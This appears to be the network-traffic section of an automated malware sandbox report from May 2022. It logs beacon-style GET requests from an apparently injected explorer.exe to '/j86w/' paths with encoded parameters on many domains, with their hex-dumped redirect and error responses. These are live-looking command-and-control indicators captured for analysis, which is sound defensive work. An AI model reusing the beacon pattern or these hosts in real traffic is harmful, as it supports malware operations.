                                                                                          May 25, 2022 00:38:19.173296928 CEST1354INData Raw: 2d 2d 20 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 2f 2f 77 77 77 2e 77 69 78 2e 63 6f 6d 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20
                                                                                          Data Ascii: -- --> <link type="image/png" href="//www.wix.com/favicon.ico" rel="shortcut icon"> ... --> <link href="//static.parastorage.com/services/third-party/fonts/Helvetica/fontFace.css" rel="stylesheet" type="text/css" /> ... --> <l
                                                                                          May 25, 2022 00:38:19.173317909 CEST1355INData Raw: 3c 2f 73 63 72 69 70 74 3e 0a 20 20 3c 21 2d 2d 20 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 73 74 61 74 69 63 2e 70 61 72 61 73 74 6f 72 61 67 65 2e 63 6f 6d 2f 73 65 72 76 69 63 65 73 2f 77 69 78 2d 70 75 62 6c 69 63 2f 31 2e
                                                                                          Data Ascii: </script> ... --><script src="//static.parastorage.com/services/wix-public/1.299.0/scripts/error-pages/app.js"></script> ... --><script> angular.module('wixErrorPagesApp').constant('staticsUrl', '//static.parastorage.com/services/
                                                                                          May 25, 2022 00:38:19.173332930 CEST1355INData Raw: 30 0d 0a 0d 0a
                                                                                          Data Ascii: 0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                          11192.168.2.54980538.143.25.23280C:\Windows\explorer.exe
                                                                                          TimestampkBytes transferredDirectionData
                                                                                          May 25, 2022 00:38:29.606348991 CEST1356OUTGET /j86w/?r0DdqnX=2zzkbFTe0CqkvIhXDvRYhtpHirIUiQLpINfg4yArn5qL17WIHFS6yL4WGUg38JzmT/ri&THiL=OBZhFrvhwhfT HTTP/1.1
                                                                                          Host: www.trustedhomebuying.com
                                                                                          Connection: close
                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                          Data Ascii:
                                                                                          May 25, 2022 00:38:29.785756111 CEST1357INHTTP/1.1 301 Moved Permanently
                                                                                          Server: nginx
                                                                                          Date: Tue, 24 May 2022 22:38:29 GMT
                                                                                          Content-Type: text/html
                                                                                          Content-Length: 162
                                                                                          Connection: close
                                                                                          Location: https://www.trustedhomebuying.com/j86w/?r0DdqnX=2zzkbFTe0CqkvIhXDvRYhtpHirIUiQLpINfg4yArn5qL17WIHFS6yL4WGUg38JzmT/ri&THiL=OBZhFrvhwhfT
                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                          12192.168.2.54980681.171.22.680C:\Windows\explorer.exe
                                                                                          TimestampkBytes transferredDirectionData
                                                                                          May 25, 2022 00:38:35.149188995 CEST1357OUTGET /j86w/?r0DdqnX=rKV3LRP602CRP/9iu+bG4aRty8vh7St3mzz2Fk7ILHaS3FPq+LENCLcMuosvpWOjIn1+&THiL=OBZhFrvhwhfT HTTP/1.1
                                                                                          Host: www.jupiter-directory.info
                                                                                          Connection: close
                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                          Data Ascii:
                                                                                          May 25, 2022 00:38:35.213639975 CEST1358INHTTP/1.1 302 Found
                                                                                          cache-control: max-age=0, private, must-revalidate
                                                                                          connection: close
                                                                                          content-length: 11
                                                                                          date: Tue, 24 May 2022 22:38:34 GMT
                                                                                          location: http://survey-smiles.com
                                                                                          server: nginx
                                                                                          set-cookie: sid=3f241c22-dbb2-11ec-80a0-d695bd1209cc; path=/; domain=.jupiter-directory.info; expires=Mon, 12 Jun 2090 01:52:42 GMT; max-age=2147483647; HttpOnly
                                                                                          Data Raw: 52 65 64 69 72 65 63 74 69 6e 67
                                                                                          Data Ascii: Redirecting


                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                          13192.168.2.54980834.102.136.18080C:\Windows\explorer.exe
                                                                                          TimestampkBytes transferredDirectionData
                                                                                          May 25, 2022 00:38:40.324682951 CEST1365OUTGET /j86w/?r0DdqnX=5yG98xSZmOV+Ql/97UdClrpjSiEw17qCWMbIEAVNPxEJnvqug39wnIBGciaFjvLM3BZW&THiL=OBZhFrvhwhfT HTTP/1.1
                                                                                          Host: www.route112mitsubishi.com
                                                                                          Connection: close
                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                          Data Ascii:
                                                                                          May 25, 2022 00:38:40.447870016 CEST1366INHTTP/1.1 403 Forbidden
                                                                                          Server: openresty
                                                                                          Date: Tue, 24 May 2022 22:38:40 GMT
                                                                                          Content-Type: text/html
                                                                                          Content-Length: 291
                                                                                          ETag: "628d16df-123"
                                                                                          Via: 1.1 google
                                                                                          Connection: close
                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                          Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8" /> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon" /> <title>Forbidden</title> </head> <body> <h1>Access Forbidden</h1> </body></html>


                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                          14192.168.2.549809198.54.117.21880C:\Windows\explorer.exe
                                                                                          TimestampkBytes transferredDirectionData
                                                                                          May 25, 2022 00:39:04.706912041 CEST1367OUTGET /j86w/?9rP=o0DdI4tPFBHLuh&r0DdqnX=otBjagVTshBG9PMS6CzAiq+mY2TM3/piC6jpHh6IKngkOkHz0iRr8aevGjXCvM8/8RXm HTTP/1.1
                                                                                          Host: www.popcornpor.xyz
                                                                                          Connection: close
                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                          Data Ascii:


                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                          15192.168.2.54981034.102.136.18080C:\Windows\explorer.exe
                                                                                          TimestampkBytes transferredDirectionData
                                                                                          May 25, 2022 00:39:14.975522041 CEST1368OUTGET /j86w/?9rP=o0DdI4tPFBHLuh&r0DdqnX=B6LpOE6d/7MuN648rLPP1if6luFBaXG3uoSdTU7h2h/OfSHF8ecdbzOiSY+hNhlZ6vTT HTTP/1.1
                                                                                          Host: www.heiboard.xyz
                                                                                          Connection: close
                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                          Data Ascii:
                                                                                          May 25, 2022 00:39:15.099600077 CEST1368INHTTP/1.1 403 Forbidden
                                                                                          Server: openresty
                                                                                          Date: Tue, 24 May 2022 22:39:15 GMT
                                                                                          Content-Type: text/html
                                                                                          Content-Length: 291
                                                                                          ETag: "628ae76f-123"
                                                                                          Via: 1.1 google
                                                                                          Connection: close
                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                          Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8" /> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon" /> <title>Forbidden</title> </head> <body> <h1>Access Forbidden</h1> </body></html>


                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                          16192.168.2.549811104.21.27.13280C:\Windows\explorer.exe
                                                                                          TimestampkBytes transferredDirectionData
                                                                                          May 25, 2022 00:39:20.297080994 CEST1369OUTGET /j86w/?r0DdqnX=vMVi2n4UkuGvqKImt4Mc7stayAR4jokxL9y1S5u4wQQjObuyknXnWCzrkLLUpdjyfe94&9rP=o0DdI4tPFBHLuh HTTP/1.1
                                                                                          Host: www.burntkeroseneblueheelers.com
                                                                                          Connection: close
                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                          Data Ascii:
                                                                                          May 25, 2022 00:39:20.511228085 CEST1371INHTTP/1.1 404 Not Found
                                                                                          Date: Tue, 24 May 2022 22:39:20 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          X-Powered-By: PHP/7.4.3
                                                                                          Cache-Control: public, max-age=60
                                                                                          Vary: Accept-Language
                                                                                          CF-Cache-Status: MISS
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=HPDXdIHdokenxLMxz2VFLmdh9nf%2BM4wa%2BIgtGiClV%2BvwM1Y5la1fJpJEp2fk3qJJEKssQpRnjnwekmibRE95SVUBIIGNryQlyvtKnRS5JqYkd30CIvDHOhT0181XdbC4hLTdMuI2m8DEr0TzW3f09JIcbg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          X-Content-Type-Options: nosniff
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 710986d7e95e7190-LHR
                                                                                          alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                          Data Raw: 36 66 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 35 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 6f 6f 70 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 52 6f 62 6f 74 6f 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74
                                                                                          Data Ascii: 6fe<!DOCTYPE html><html lang="en"> <head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"> <title>Error</title> <meta name="description" content=""> <meta name="viewport" content="width=device-width, initial-scale=1"> <link href="https://fonts.googleapis.com/css?family=Roboto:500" rel="stylesheet"> <style type="text/css"> body { background-color: #fff; } .oops { font-family: Roboto, sans-serif; font-weight
                                                                                          May 25, 2022 00:39:20.511270046 CEST1372INData Raw: 3a 20 35 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 38 38 70 78 3b 0a 20 20 20 20 20 20
                                                                                          Data Ascii: : 500; line-height: 120px; font-size: 88px; color: #DADDE0; } .error-msg { position: absolute; left: 50%; top: 50%;
                                                                                          May 25, 2022 00:39:20.511286974 CEST1372INData Raw: 30 0d 0a 0d 0a
                                                                                          Data Ascii: 0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                          17192.168.2.549813198.54.117.21780C:\Windows\explorer.exe
                                                                                          TimestampkBytes transferredDirectionData
                                                                                          May 25, 2022 00:39:25.738101006 CEST1379OUTGET /j86w/?9rP=o0DdI4tPFBHLuh&r0DdqnX=NReRvsvJRfGWlTK0vxyHeO9Y7SNAAXczgujBnihGKczK6Cn0FpBEGF9o5XqAzRdHptoj HTTP/1.1
                                                                                          Host: www.medicaleducationbangladesh.com
                                                                                          Connection: close
                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                          Data Ascii:


                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                          18192.168.2.549815172.67.219.1980C:\Windows\explorer.exe
                                                                                          TimestampkBytes transferredDirectionData
                                                                                          May 25, 2022 00:39:30.985747099 CEST1387OUTGET /j86w/?r0DdqnX=MHHHj9BXgxViWqPLnxqr1nFZFzNQ/F/VjXLjFAe6afOVeFSDEGKeMdk4NGPeJtlBjoTt&9rP=o0DdI4tPFBHLuh HTTP/1.1
                                                                                          Host: www.lingmao08.com
                                                                                          Connection: close
                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                          Data Ascii:
                                                                                          May 25, 2022 00:39:31.035084009 CEST1387INHTTP/1.1 301 Moved Permanently
                                                                                          Date: Tue, 24 May 2022 22:39:31 GMT
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          Cache-Control: max-age=3600
                                                                                          Expires: Tue, 24 May 2022 23:39:31 GMT
                                                                                          Location: https://www.lingmao08.com/j86w/?r0DdqnX=MHHHj9BXgxViWqPLnxqr1nFZFzNQ/F/VjXLjFAe6afOVeFSDEGKeMdk4NGPeJtlBjoTt&9rP=o0DdI4tPFBHLuh
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=H6AKjh8ReKhq2MOU%2BHjqVH1cYlFLr9HIFyAuA5fGx33zfRpr6dQjDDOjJ%2FNYmYUrpi44v06TRHxjE5wcMWNyOAsZZrjaUTYhO%2Bd9PkJK%2B8mgog3azzZGDH%2FE9%2FMfxAH7%2B2Bjlg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 7109871ab8b3f417-LHR
                                                                                          alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                          Data Ascii: 0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                          19192.168.2.54981634.117.168.23380C:\Windows\explorer.exe
                                                                                          TimestampkBytes transferredDirectionData
                                                                                          May 25, 2022 00:39:36.125531912 CEST1388OUTGET /j86w/?9rP=o0DdI4tPFBHLuh&r0DdqnX=yKTGLI+0hL2BDOWtnpkJD3ucTFHFYk4E4D+J/cKEoeBM9eHABkvZa3d9fxVWbjwcPE7R HTTP/1.1
                                                                                          Host: www.jamiebakes.net
                                                                                          Connection: close
                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                          Data Ascii:
                                                                                          May 25, 2022 00:39:36.192634106 CEST1390INHTTP/1.1 404 Not Found
                                                                                          Date: Tue, 24 May 2022 22:39:36 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Transfer-Encoding: chunked
                                                                                          x-wix-request-id: 1653431976.1321752645730597
                                                                                          Age: 0
                                                                                          Server-Timing: cache;desc=miss, varnish;desc=miss, dc;desc=euw3
                                                                                          X-Seen-By: GXNXSWFXisshliUcwO20NXdyD4zpCpFzpCPkLds0yMfwWumffprhrqhUts+0RXmk,qquldgcFrj2n046g4RNSVCA9lUGGSSQQI3tXitet/XU=,2d58ifebGbosy5xc+FRals47NSbRY+saEB7SkBjxpWV3meP9HntDblqLPs3WzFUcjoe2GMQJ/MdiMK4Y/vI707NcHT9jnDzO/9kyZO6+ozE=,2UNV7KOq4oGjA5+PKsX47ARSt+S4p3KgmtdD48b3UGRYgeUJqUXtid+86vZww+nL,7npGRUZHWOtWoP0Si3wDp+SOLc04u3suljHr5fp0ZSE=,xTu8fpDe3EKPsMR1jrheENjxvIi4S/tdauezSCBwpuE=,v8/9RyiPVS5W/0J6Pu/x9wnOoFETI3p6H585CnGOVufbBGrfgbVxXPGwhsTMrP9n
                                                                                          Vary: Accept-Encoding
                                                                                          X-Content-Type-Options: nosniff
                                                                                          Server: Pepyaka/1.19.10
                                                                                          Via: 1.1 google
                                                                                          x-wix-google-ccm: 1
                                                                                          Connection: close
                                                                                          Data Raw: 62 39 33 0d 0a 20 20 3c 21 2d 2d 20 20 2d 2d 3e 0a 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 0a 20 20 20 20 2d 2d 3e 0a 3c 68 74 6d 6c 20 6e 67 2d 61 70 70 3d 22 77 69 78 45 72 72 6f 72 50 61 67 65 73 41 70 70 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 3c 74 69 74 6c 65 20 6e 67 2d 62 69 6e 64 3d 22 27 70 61 67 65 5f 74 69 74 6c 65 27 20 7c 20 74 72 61 6e 73 6c 61 74 65 22 3e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 20 20 3c 21 2d 2d 20 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 74 79 70 65 3d 22
                                                                                          Data Ascii: b93 ... --><!doctype html>... --><html ng-app="wixErrorPagesApp"><head> <meta name="viewport" content="width=device-width,initial-scale=1, maximum-scale=1, user-scalable=no"> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <title ng-bind="'page_title' | translate"></title> <meta name="description" content=""> <meta name="viewport" content="width=device-width"> <meta name="robots" content="noindex, nofollow"> ... --> <link type="
                                                                                          May 25, 2022 00:39:36.192663908 CEST1391INData Raw: 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 2f 2f 77 77 77 2e 77 69 78 2e 63 6f 6d 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 3e 0a 20 20 3c 21 2d 2d 20 20 2d 2d 3e 0a 20 20 3c 6c 69
                                                                                          Data Ascii: image/png" href="//www.wix.com/favicon.ico" rel="shortcut icon"> ... --> <link href="//static.parastorage.com/services/third-party/fonts/Helvetica/fontFace.css" rel="stylesheet" type="text/css" /> ... --> <link rel="stylesheet" hre
                                                                                          May 25, 2022 00:39:36.192679882 CEST1392INData Raw: 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 73 74 61 74 69 63 2e 70 61 72 61 73 74 6f 72 61 67 65 2e 63 6f 6d 2f 73 65 72 76 69 63 65 73 2f 77 69 78 2d 70 75 62 6c 69 63 2f 31 2e 32 39 39 2e 30 2f 73 63 72 69 70 74 73 2f 65 72 72 6f 72 2d 70 61 67 65
                                                                                          Data Ascii: cript src="//static.parastorage.com/services/wix-public/1.299.0/scripts/error-pages/app.js"></script> ... --><script> angular.module('wixErrorPagesApp').constant('staticsUrl', '//static.parastorage.com/services/wix-public/1.299.0/');


                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                          2192.168.2.54979334.102.136.18080C:\Windows\explorer.exe
                                                                                          TimestampkBytes transferredDirectionData
                                                                                          May 25, 2022 00:37:36.025887966 CEST1320OUTGET /j86w/?r0DdqnX=B6LpOE6d/7MuN648rLPP1if6luFBaXG3uoSdTU7h2h/OfSHF8ecdbzOiSY+hNhlZ6vTT&THiL=OBZhFrvhwhfT HTTP/1.1
                                                                                          Host: www.heiboard.xyz
                                                                                          Connection: close
                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                          Data Ascii:
                                                                                          May 25, 2022 00:37:36.150230885 CEST1321INHTTP/1.1 403 Forbidden
                                                                                          Server: openresty
                                                                                          Date: Tue, 24 May 2022 22:37:36 GMT
                                                                                          Content-Type: text/html
                                                                                          Content-Length: 291
                                                                                          ETag: "628d16df-123"
                                                                                          Via: 1.1 google
                                                                                          Connection: close
                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                          Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8" /> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon" /> <title>Forbidden</title> </head> <body> <h1>Access Forbidden</h1> </body></html>


                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                          20192.168.2.549817217.160.0.20680C:\Windows\explorer.exe
                                                                                          TimestampkBytes transferredDirectionData
                                                                                          May 25, 2022 00:39:41.286144972 CEST1393OUTGET /j86w/?r0DdqnX=wf5/vnneqUemtqC2qYInHLv4xbvkfp/IEqObvAzhO0jbXBUqPz0aZ0ecqS4jD5PKufzr&9rP=o0DdI4tPFBHLuh HTTP/1.1
                                                                                          Host: www.theminercrypto.com
                                                                                          Connection: close
                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                          Data Ascii:
                                                                                          May 25, 2022 00:39:41.412096977 CEST1394INHTTP/1.1 302 Moved Temporarily
                                                                                          Server: nginx
                                                                                          Date: Tue, 24 May 2022 22:39:41 GMT
                                                                                          Content-Type: text/html
                                                                                          Content-Length: 138
                                                                                          Connection: close
                                                                                          Location: https://www.theminercrypto.com/j86w/?r0DdqnX=wf5/vnneqUemtqC2qYInHLv4xbvkfp/IEqObvAzhO0jbXBUqPz0aZ0ecqS4jD5PKufzr&9rP=o0DdI4tPFBHLuh
                                                                                          Expires: Tue, 24 May 2022 22:59:41 GMT
                                                                                          Cache-Control: max-age=1200
                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                          Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                          21192.168.2.549818104.16.100.5180C:\Windows\explorer.exe
                                                                                          TimestampkBytes transferredDirectionData
